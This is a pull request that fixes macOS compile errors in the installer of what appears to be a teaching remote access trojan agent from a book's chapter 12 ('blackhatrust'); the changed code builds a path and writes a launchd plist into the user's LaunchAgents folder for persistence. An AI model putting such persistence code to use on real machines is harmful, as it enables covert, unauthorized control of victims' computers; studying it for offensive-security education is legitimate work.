### PR TITLE
fix compile errors on macos, ch_12

### DIFF
--- a/ch_12/rat/agent/src/install/macos.rs
+++ b/ch_12/rat/agent/src/install/macos.rs
@@ -39,12 +39,11 @@ fn install_launchd(executable: &PathBuf) -> Result<(), crate::Error> {
 
     let mut launchd_file = match dirs::home_dir() {
         Some(home_dir) => home_dir,
-        None => return Err(Error::Internal("Error getting home directory.".to_string())),
+        None => return Err(crate::Error::Internal("Error getting home directory.".to_string())),
     };
-    launchd_file
-        .push("Library")
-        .push("LaunchAgents")
-        .push(LAUNCHD_FILE);
+    launchd_file.push("Library");
+    launchd_file.push("LaunchAgents");
+    launchd_file.push(LAUNCHD_FILE);
 
     fs::write(&launchd_file, launchd_file_content)?;
 

--- a/ch_12/rat/agent/src/install/macos.rs
+++ b/ch_12/rat/agent/src/install/macos.rs
@@ -1,4 +1,3 @@
-use crate::config;
 use std::{fs, path::PathBuf, process::Command};
 
 pub const LAUNCHD_FILE: &str = "com.blackhatrust.agent.plist";


### PR DESCRIPTION
- launchd_file.push can't be chained, replaced with 3 separate calls
- replaced Error::Internal with crate::Error::Internal